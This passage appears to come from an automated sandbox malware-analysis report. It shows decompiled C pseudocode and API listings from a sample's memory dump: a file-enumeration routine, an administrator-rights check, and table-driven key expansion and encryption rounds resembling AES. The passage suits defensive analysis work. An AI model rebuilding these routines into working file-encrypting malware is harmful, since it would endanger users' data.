                                        • Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                        • Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
                                        • Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                      • String ID:
                                      • API String ID: 1112924665-0
                                      • Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
                                      • Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E00403A60() {
                                      				signed int _v8;
                                      				void* _v12;
                                      				short _v16;
                                      				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                      				int _t13;
                                      				_Unknown_base(*)()* _t15;
                                      				signed int _t16;
                                      
                                      				_v20.Value = 0;
                                      				_v16 = 0x500;
                                      				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                      				if(_t13 != 0) {
                                      					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                      					_t5 =  &_v8; // 0x404a63
                                      					_t16 =  *_t15(0, _v12, _t5);
                                      					asm("sbb eax, eax");
                                      					_v8 = _v8 &  ~_t16;
                                      					FreeSid(_v12);
                                      					_t10 =  &_v8; // 0x404a63
                                      					return  *_t10;
                                      				} else {
                                      					return _t13;
                                      				}
                                      			}










                                      0x00403a69
                                      0x00403a89
                                      0x00403a90
                                      0x00403a98
                                      0x00403aaf
                                      0x00403ab5
                                      0x00403abe
                                      0x00403ac5
                                      0x00403ac7
                                      0x00403aca
                                      0x00403ad0
                                      0x00403ad6
                                      0x00403a9d
                                      0x00403a9d
                                      0x00403a9d

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
                                      • FreeSid.ADVAPI32(?), ref: 00403ACA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                      • String ID: CheckTokenMembership$advapi32.dll$cJ@
                                      • API String ID: 3309497720-3398485638
                                      • Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
                                      • Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00407EE0(signed int _a4, char _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				intOrPtr* _t274;
                                      				signed int _t284;
                                      				signed int _t287;
                                      				unsigned int _t289;
                                      				intOrPtr _t297;
                                      				signed int _t306;
                                      				signed int _t309;
                                      				unsigned int _t311;
                                      				intOrPtr _t319;
                                      				signed int _t328;
                                      				signed int _t331;
                                      				unsigned int _t333;
                                      				intOrPtr _t341;
                                      				signed int _t350;
                                      				signed int _t353;
                                      				unsigned int _t355;
                                      				intOrPtr _t363;
                                      				signed int _t372;
                                      				signed int _t375;
                                      				unsigned int _t377;
                                      				intOrPtr _t385;
                                      				signed int _t394;
                                      				signed int _t397;
                                      				unsigned int _t399;
                                      				intOrPtr _t407;
                                      				signed int _t416;
                                      				intOrPtr* _t420;
                                      				signed int _t421;
                                      				signed int _t422;
                                      				signed int _t423;
                                      				signed int _t424;
                                      				signed int _t425;
                                      				signed int _t426;
                                      				signed char _t427;
                                      				signed int _t428;
                                      				signed int _t429;
                                      				signed int _t430;
                                      				signed int _t431;
                                      				signed int _t441;
                                      				intOrPtr _t442;
                                      				signed int _t458;
                                      				intOrPtr _t459;
                                      				signed int _t475;
                                      				intOrPtr _t476;
                                      				signed int _t492;
                                      				intOrPtr _t493;
                                      				signed int _t509;
                                      				intOrPtr _t510;
                                      				signed int _t526;
                                      				intOrPtr _t527;
                                      				signed int _t542;
                                      				signed int _t543;
                                      				signed int _t544;
                                      				signed int _t545;
                                      				signed int _t546;
                                      				signed int _t547;
                                      				signed int _t548;
                                      				signed int _t549;
                                      				signed int _t551;
                                      				signed int _t553;
                                      				signed int _t554;
                                      				signed int _t555;
                                      				signed int _t556;
                                      				signed int _t557;
                                      				signed int _t558;
                                      				signed int _t559;
                                      				signed int _t561;
                                      				signed int _t562;
                                      				signed int _t563;
                                      				signed int _t564;
                                      				signed int _t565;
                                      				signed int _t566;
                                      				signed int _t567;
                                      				intOrPtr _t568;
                                      
                                      				_t274 = _a4;
                                      				_t2 =  &_a8; // 0x40376f
                                      				_t420 =  *_t2;
                                      				_t428 =  *_t274;
                                      				_v12 = _t428;
                                      				 *_t420 = _t428;
                                      				_t429 =  *((intOrPtr*)(_t274 + 4));
                                      				 *((intOrPtr*)(_t420 + 4)) = _t429;
                                      				_v16 = _t429;
                                      				_t430 =  *((intOrPtr*)(_t274 + 8));
                                      				 *((intOrPtr*)(_t420 + 8)) = _t430;
                                      				_v8 = _t430;
                                      				_t431 =  *((intOrPtr*)(_t274 + 0xc));
                                      				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
                                      				_t543 =  *(_t274 + 0x10);
                                      				 *(_t420 + 0x10) = _t543;
                                      				_t561 =  *(_t274 + 0x14);
                                      				 *(_t420 + 0x14) = _t561;
                                      				_a4 = _t431;
                                      				_t553 =  *(_t274 + 0x18);
                                      				 *(_t420 + 0x18) = _t553;
                                      				_t421 =  *(_t274 + 0x1c);
                                      				_t20 =  &_a8; // 0x40376f
                                      				 *( *_t20 + 0x1c) = _t421;
                                      				_t284 = _v12 ^  *(0x40aa40 + (_t421 >> 0x18) * 4) ^  *(0x40a640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t421 & 0x000000ff) * 4) ^  *0x409200;
                                      				_t31 =  &_a8; // 0x40376f
                                      				_v12 = _t284;
                                      				 *( *_t31 + 0x20) = _t284;
                                      				_t34 =  &_v16; // 0x40376f
                                      				_t441 =  *_t34 ^ _t284;
                                      				_t35 =  &_a8; // 0x40376f
                                      				_v16 = _t441;
                                      				 *( *_t35 + 0x24) = _t441;
                                      				_t287 = _v8 ^ _t441;
                                      				_t39 =  &_a8; // 0x40376f
                                      				_t442 =  *_t39;
                                      				_v8 = _t287;
                                      				 *(_t442 + 0x28) = _t287;
                                      				_t289 = _a4 ^ _v8;
                                      				 *(_t442 + 0x2c) = _t289;
                                      				_a4 = _t289;
                                      				_t56 =  &_a8; // 0x40376f
                                      				_t297 =  *_t56;
                                      				_t544 = _t543 ^  *(0x40ae40 + (_t289 >> 0x18) * 4) ^  *(0x40aa40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t562 = _t561 ^ _t544;
                                      				_t554 = _t553 ^ _t562;
                                      				_t422 = _t421 ^ _t554;
                                      				 *(_t297 + 0x30) = _t544;
                                      				 *(_t297 + 0x34) = _t562;
                                      				 *(_t297 + 0x38) = _t554;
                                      				 *(_t297 + 0x3c) = _t422;
                                      				_t306 = _v12 ^  *(0x40aa40 + (_t422 >> 0x18) * 4) ^  *(0x40a640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t422 & 0x000000ff) * 4) ^  *0x409204;
                                      				_t70 =  &_a8; // 0x40376f
                                      				_v12 = _t306;
                                      				 *( *_t70 + 0x40) = _t306;
                                      				_t73 =  &_v16; // 0x40376f
                                      				_t458 =  *_t73 ^ _t306;
                                      				_t74 =  &_a8; // 0x40376f
                                      				_v16 = _t458;
                                      				 *( *_t74 + 0x44) = _t458;
                                      				_t309 = _v8 ^ _t458;
                                      				_t78 =  &_a8; // 0x40376f
                                      				_t459 =  *_t78;
                                      				_v8 = _t309;
                                      				 *(_t459 + 0x48) = _t309;
                                      				_t311 = _a4 ^ _v8;
                                      				 *(_t459 + 0x4c) = _t311;
                                      				_a4 = _t311;
                                      				_t95 =  &_a8; // 0x40376f
                                      				_t319 =  *_t95;
                                      				_t545 = _t544 ^  *(0x40ae40 + (_t311 >> 0x18) * 4) ^  *(0x40aa40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t563 = _t562 ^ _t545;
                                      				_t555 = _t554 ^ _t563;
                                      				_t423 = _t422 ^ _t555;
                                      				 *(_t319 + 0x50) = _t545;
                                      				 *(_t319 + 0x54) = _t563;
                                      				 *(_t319 + 0x58) = _t555;
                                      				 *(_t319 + 0x5c) = _t423;
                                      				_t328 = _v12 ^  *(0x40aa40 + (_t423 >> 0x18) * 4) ^  *(0x40a640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t423 & 0x000000ff) * 4) ^  *0x409208;
                                      				_t109 =  &_a8; // 0x40376f
                                      				_v12 = _t328;
                                      				 *( *_t109 + 0x60) = _t328;
                                      				_t112 =  &_v16; // 0x40376f
                                      				_t475 =  *_t112 ^ _t328;
                                      				_t113 =  &_a8; // 0x40376f
                                      				_v16 = _t475;
                                      				 *( *_t113 + 0x64) = _t475;
                                      				_t331 = _v8 ^ _t475;
                                      				_t117 =  &_a8; // 0x40376f
                                      				_t476 =  *_t117;
                                      				_v8 = _t331;
                                      				 *(_t476 + 0x68) = _t331;
                                      				_t333 = _a4 ^ _v8;
                                      				 *(_t476 + 0x6c) = _t333;
                                      				_a4 = _t333;
                                      				_t134 =  &_a8; // 0x40376f
                                      				_t341 =  *_t134;
                                      				_t546 = _t545 ^  *(0x40ae40 + (_t333 >> 0x18) * 4) ^  *(0x40aa40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t564 = _t563 ^ _t546;
                                      				_t556 = _t555 ^ _t564;
                                      				_t424 = _t423 ^ _t556;
                                      				 *(_t341 + 0x70) = _t546;
                                      				 *(_t341 + 0x74) = _t564;
                                      				 *(_t341 + 0x78) = _t556;
                                      				 *(_t341 + 0x7c) = _t424;
                                      				_t350 = _v12 ^  *(0x40aa40 + (_t424 >> 0x18) * 4) ^  *(0x40a640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t424 & 0x000000ff) * 4) ^  *0x40920c;
                                      				_t148 =  &_a8; // 0x40376f
                                      				_v12 = _t350;
                                      				 *( *_t148 + 0x80) = _t350;
                                      				_t151 =  &_v16; // 0x40376f
                                      				_t492 =  *_t151 ^ _t350;
                                      				_t152 =  &_a8; // 0x40376f
                                      				_v16 = _t492;
                                      				 *( *_t152 + 0x84) = _t492;
                                      				_t353 = _v8 ^ _t492;
                                      				_t156 =  &_a8; // 0x40376f
                                      				_t493 =  *_t156;
                                      				_v8 = _t353;
                                      				 *(_t493 + 0x88) = _t353;
                                      				_t355 = _a4 ^ _v8;
                                      				 *(_t493 + 0x8c) = _t355;
                                      				_a4 = _t355;
                                      				_t173 =  &_a8; // 0x40376f
                                      				_t363 =  *_t173;
                                      				_t547 = _t546 ^  *(0x40ae40 + (_t355 >> 0x18) * 4) ^  *(0x40aa40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t565 = _t564 ^ _t547;
                                      				_t557 = _t556 ^ _t565;
                                      				 *(_t363 + 0x90) = _t547;
                                      				 *(_t363 + 0x94) = _t565;
                                      				 *(_t363 + 0x98) = _t557;
                                      				_t425 = _t424 ^ _t557;
                                      				 *(_t363 + 0x9c) = _t425;
                                      				_t372 = _v12 ^  *(0x40aa40 + (_t425 >> 0x18) * 4) ^  *(0x40a640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t425 & 0x000000ff) * 4) ^  *0x409210;
                                      				_t187 =  &_a8; // 0x40376f
                                      				_v12 = _t372;
                                      				 *( *_t187 + 0xa0) = _t372;
                                      				_t190 =  &_v16; // 0x40376f
                                      				_t509 =  *_t190 ^ _t372;
                                      				_t191 =  &_a8; // 0x40376f
                                      				_v16 = _t509;
                                      				 *( *_t191 + 0xa4) = _t509;
                                      				_t375 = _v8 ^ _t509;
                                      				_t195 =  &_a8; // 0x40376f
                                      				_t510 =  *_t195;
                                      				_v8 = _t375;
                                      				 *(_t510 + 0xa8) = _t375;
                                      				_t377 = _a4 ^ _v8;
                                      				 *(_t510 + 0xac) = _t377;
                                      				_a4 = _t377;
                                      				_t212 =  &_a8; // 0x40376f
                                      				_t385 =  *_t212;
                                      				_t548 = _t547 ^  *(0x40ae40 + (_t377 >> 0x18) * 4) ^  *(0x40aa40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t566 = _t565 ^ _t548;
                                      				_t558 = _t557 ^ _t566;
                                      				_t426 = _t425 ^ _t558;
                                      				 *(_t385 + 0xb0) = _t548;
                                      				 *(_t385 + 0xb4) = _t566;
                                      				 *(_t385 + 0xb8) = _t558;
                                      				 *(_t385 + 0xbc) = _t426;
                                      				_t394 = _v12 ^  *(0x40aa40 + (_t426 >> 0x18) * 4) ^  *(0x40a640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t426 & 0x000000ff) * 4) ^  *0x409214;
                                      				_t226 =  &_a8; // 0x40376f
                                      				_v12 = _t394;
                                      				 *( *_t226 + 0xc0) = _t394;
                                      				_t229 =  &_v16; // 0x40376f
                                      				_t526 =  *_t229 ^ _t394;
                                      				_t230 =  &_a8; // 0x40376f
                                      				_v16 = _t526;
                                      				 *( *_t230 + 0xc4) = _t526;
                                      				_t397 = _v8 ^ _t526;
                                      				_t234 =  &_a8; // 0x40376f
                                      				_t527 =  *_t234;
                                      				_v8 = _t397;
                                      				 *(_t527 + 0xc8) = _t397;
                                      				_t399 = _a4 ^ _v8;
                                      				 *(_t527 + 0xcc) = _t399;
                                      				_a4 = _t399;
                                      				_t251 =  &_a8; // 0x40376f
                                      				_t407 =  *_t251;
                                      				_t549 = _t548 ^  *(0x40ae40 + (_t399 >> 0x18) * 4) ^  *(0x40aa40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
                                      				_t567 = _t566 ^ _t549;
                                      				_t559 = _t558 ^ _t567;
                                      				_t427 = _t426 ^ _t559;
                                      				 *(_t407 + 0xd4) = _t567;
                                      				_t568 = _t407;
                                      				 *(_t407 + 0xd0) = _t549;
                                      				 *(_t568 + 0xd8) = _t559;
                                      				 *(_t568 + 0xdc) = _t427;
                                      				_t416 = _v12 ^  *(0x40aa40 + (_t427 >> 0x18) * 4) ^  *(0x40a640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t427 & 0x000000ff) * 4) ^  *0x409218;
                                      				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
                                      				_t267 =  &_v16; // 0x40376f
                                      				_t542 =  *_t267 ^ _t416;
                                      				 *(_t568 + 0xe0) = _t416;
                                      				_t551 = _v8 ^ _t542;
                                      				 *(_t568 + 0xe4) = _t542;
                                      				 *(_t568 + 0xec) = _a4 ^ _t551;
                                      				 *(_t568 + 0xe8) = _t551;
                                      				 *((char*)(_t568 + 0xf0)) = 0xe0;
                                      				return 0;
                                      			}
















































































                                      0x00407ee6
                                      0x00407eea
                                      0x00407eea
                                      0x00407eee
                                      0x00407ef0
                                      0x00407ef3
                                      0x00407ef5
                                      0x00407ef8
                                      0x00407efb
                                      0x00407efe
                                      0x00407f01
                                      0x00407f04
                                      0x00407f07
                                      0x00407f0a
                                      0x00407f0d
                                      0x00407f10
                                      0x00407f13
                                      0x00407f16
                                      0x00407f19
                                      0x00407f1d
                                      0x00407f20
                                      0x00407f23
                                      0x00407f28
                                      0x00407f2e
                                      0x00407f69
                                      0x00407f6b
                                      0x00407f6e
                                      0x00407f71
                                      0x00407f74
                                      0x00407f77
                                      0x00407f79
                                      0x00407f7c
                                      0x00407f7f
                                      0x00407f85
                                      0x00407f87
                                      0x00407f87
                                      0x00407f8a
                                      0x00407f8d
                                      0x00407f93
                                      0x00407f96
                                      0x00407f9b
                                      0x00407fd2
                                      0x00407fd2
                                      0x00407fd5
                                      0x00407fd7
                                      0x00407fd9
                                      0x00407fdb
                                      0x00407fdd
                                      0x00407fe0
                                      0x00407fe3
                                      0x00407fe6
                                      0x00408026
                                      0x00408028
                                      0x0040802b
                                      0x0040802e
                                      0x00408031
                                      0x00408034
                                      0x00408036
                                      0x00408039
                                      0x0040803c
                                      0x00408042
                                      0x00408044
                                      0x00408044
                                      0x00408047
                                      0x0040804a
                                      0x00408050
                                      0x00408053
                                      0x00408058
                                      0x0040808f
                                      0x0040808f
                                      0x00408092
                                      0x00408094
                                      0x00408096
                                      0x00408098
                                      0x0040809a
                                      0x0040809f
                                      0x004080a2
                                      0x004080a5
                                      0x004080e3
                                      0x004080e5
                                      0x004080e8
                                      0x004080eb
                                      0x004080ee
                                      0x004080f1
                                      0x004080f3
                                      0x004080f6
                                      0x004080f9
                                      0x004080ff
                                      0x00408101
                                      0x00408101
                                      0x00408104
                                      0x00408107
                                      0x0040810d
                                      0x00408110
                                      0x00408115
                                      0x0040814c
                                      0x0040814c
                                      0x0040814f
                                      0x00408151
                                      0x00408153
                                      0x00408155
                                      0x00408157
                                      0x0040815c
                                      0x0040815f
                                      0x00408162
                                      0x004081a0
                                      0x004081a2
                                      0x004081a5
                                      0x004081a8
                                      0x004081ae
                                      0x004081b1
                                      0x004081b3
                                      0x004081b6
                                      0x004081b9
                                      0x004081c2
                                      0x004081c4
                                      0x004081c4
                                      0x004081c7
                                      0x004081ca
                                      0x004081d3
                                      0x004081d6
                                      0x004081de
                                      0x00408215
                                      0x00408215
                                      0x00408218
                                      0x0040821a
                                      0x0040821c
                                      0x0040821e
                                      0x00408224
                                      0x0040822a
                                      0x00408230
                                      0x00408232
                                      0x00408275
                                      0x00408277
                                      0x0040827a
                                      0x0040827d
                                      0x00408283
                                      0x00408286
                                      0x00408288
                                      0x0040828b
                                      0x0040828e
                                      0x00408297
                                      0x00408299
                                      0x00408299
                                      0x0040829c
                                      0x0040829f
                                      0x004082a8
                                      0x004082ab
                                      0x004082b3
                                      0x004082ea
                                      0x004082ea
                                      0x004082ed
                                      0x004082ef
                                      0x004082f1
                                      0x004082f3
                                      0x004082f5
                                      0x004082fd
                                      0x00408303
                                      0x00408309
                                      0x0040834a
                                      0x0040834c
                                      0x0040834f
                                      0x00408352
                                      0x00408358
                                      0x0040835b
                                      0x0040835d
                                      0x00408360
                                      0x00408363
                                      0x0040836c
                                      0x0040836e
                                      0x0040836e
                                      0x00408371
                                      0x00408374
                                      0x0040837d
                                      0x00408380
                                      0x00408388
                                      0x004083bf
                                      0x004083bf
                                      0x004083c2
                                      0x004083c4
                                      0x004083c6
                                      0x004083c8
                                      0x004083ca
                                      0x004083d2
                                      0x004083d4
                                      0x004083e5
                                      0x004083eb
                                      0x00408425
                                      0x00408427
                                      0x00408431
                                      0x00408434
                                      0x00408436
                                      0x0040843f
                                      0x00408443
                                      0x00408449
                                      0x00408451
                                      0x00408457
                                      0x00408463

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: o7@$o7@
                                      • API String ID: 0-723442174
                                      • Opcode ID: da1e04724c4d4a96aecbab103dab413677a1afa7e8d63378d07e38b9d77e31b1
                                      • Instruction ID: 357c3c7235a915dd8e15f01338308de149f5b460bfde231befa3c1aa23e4610d
                                      • Opcode Fuzzy Hash: da1e04724c4d4a96aecbab103dab413677a1afa7e8d63378d07e38b9d77e31b1
                                      • Instruction Fuzzy Hash: 1E12E770A102149FCB08CF69D99096ABBF1FB4D300B4684BEE94ADB391CB35AA51CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00402000(void* __eax, signed int __ebx, unsigned int __ecx, intOrPtr* __edi, signed int __esi) {
                                      				signed char _t358;
                                      				signed char _t366;
                                      				signed char _t374;
                                      				signed char _t382;
                                      				signed char _t390;
                                      				signed char _t398;
                                      				signed char _t406;
                                      				signed char _t414;
                                      				signed char _t422;
                                      				signed char _t434;
                                      				signed char _t437;
                                      				signed char _t439;
                                      				signed char _t442;
                                      				signed char _t444;
                                      				signed char _t447;
                                      				signed char _t449;
                                      				signed char _t452;
                                      				signed char _t454;
                                      				signed char _t457;
                                      				signed char _t459;
                                      				signed char _t462;
                                      				signed char _t464;
                                      				signed char _t467;
                                      				signed char _t469;
                                      				signed char _t472;
                                      				signed char _t474;
                                      				signed char _t475;
                                      				signed char _t477;
                                      				signed char _t479;
                                      				signed char _t480;
                                      				signed char _t485;
                                      				signed char _t493;
                                      				signed char _t494;
                                      				signed char _t502;
                                      				signed char _t503;
                                      				signed char _t511;
                                      				signed char _t512;
                                      				signed char _t520;
                                      				signed char _t521;
                                      				signed char _t529;
                                      				signed char _t530;
                                      				signed char _t538;
                                      				signed char _t539;
                                      				signed char _t547;
                                      				signed char _t548;
                                      				signed char _t556;
                                      				signed char _t557;
                                      				signed char _t565;
                                      				signed char _t566;
                                      				signed char _t594;
                                      				signed int* _t700;
                                      				signed int* _t701;
                                      				signed int* _t713;
                                      				signed int* _t714;
                                      				signed int* _t726;
                                      				signed int* _t727;
                                      				signed int* _t739;
                                      				signed int* _t740;
                                      				signed int* _t752;
                                      				signed int* _t753;
                                      				signed int* _t765;
                                      				signed int* _t766;
                                      				signed int* _t778;
                                      				signed int* _t779;
                                      				signed int* _t791;
                                      				signed int* _t792;
                                      				signed int* _t804;
                                      				signed int* _t805;
                                      				signed int* _t817;
                                      				signed int* _t818;
                                      				signed int** _t820;
                                      
                                      				asm("lodsd");
                                      				 *__edi =  *__edi + __ecx;
                                      				_t434 = __ebx & 0xffff0000 | __eax + 0x00000001 >> 0x00000010;
                                      				_t485 = __ecx >> 0x10;
                                      				_t493 = __esi ^  *0x0040C1F4;
                                      				_t700 =  *_t820;
                                      				_t358 =  *(0x40ba40 + (_t485 & 0x000000ff) * 4) ^  *(0x40b240 + (_t434 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t434 >> 0x00000010 & 0x000000ff) * 4) ^  *_t700;
                                      				_t437 =  *(0x40b240 + (__ebx & 0x000000ff) * 4) ^  *(0x40b640 + (_t434 & 0x000000ff) * 4) ^  *(0x40be40 + (_t485 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t700[1];
                                      				_t701 =  &(_t700[4]);
                                      				 *_t820 = _t701;
                                      				asm("rol eax, 0x10");
                                      				_t439 = _t437 & 0xffff0000 | _t358 >> 0x00000010;
                                      				_t494 = _t493 >> 0x10;
                                      				_t502 = _t701[2] ^  *(0x40b240 + (_t493 & 0x000000ff) * 4) ^  *(0x40b640 + (_t437 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t358 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t713 =  *_t820;
                                      				_t366 =  *(0x40ba40 + (_t494 & 0x000000ff) * 4) ^  *(0x40b240 + (_t439 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t439 >> 0x00000010 & 0x000000ff) * 4) ^  *_t713;
                                      				_t442 =  *(0x40b240 + (_t437 & 0x000000ff) * 4) ^  *(0x40b640 + (_t439 & 0x000000ff) * 4) ^  *(0x40be40 + (_t494 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t713[1];
                                      				_t714 =  &(_t713[4]);
                                      				 *_t820 = _t714;
                                      				asm("rol eax, 0x10");
                                      				_t444 = _t442 & 0xffff0000 | _t366 >> 0x00000010;
                                      				_t503 = _t502 >> 0x10;
                                      				_t511 = _t714[2] ^  *(0x40b240 + (_t502 & 0x000000ff) * 4) ^  *(0x40b640 + (_t442 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t366 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t726 =  *_t820;
                                      				_t374 =  *(0x40ba40 + (_t503 & 0x000000ff) * 4) ^  *(0x40b240 + (_t444 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t444 >> 0x00000010 & 0x000000ff) * 4) ^  *_t726;
                                      				_t447 =  *(0x40b240 + (_t442 & 0x000000ff) * 4) ^  *(0x40b640 + (_t444 & 0x000000ff) * 4) ^  *(0x40be40 + (_t503 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t726[1];
                                      				_t727 =  &(_t726[4]);
                                      				 *_t820 = _t727;
                                      				asm("rol eax, 0x10");
                                      				_t449 = _t447 & 0xffff0000 | _t374 >> 0x00000010;
                                      				_t512 = _t511 >> 0x10;
                                      				_t520 = _t727[2] ^  *(0x40b240 + (_t511 & 0x000000ff) * 4) ^  *(0x40b640 + (_t447 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t374 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t739 =  *_t820;
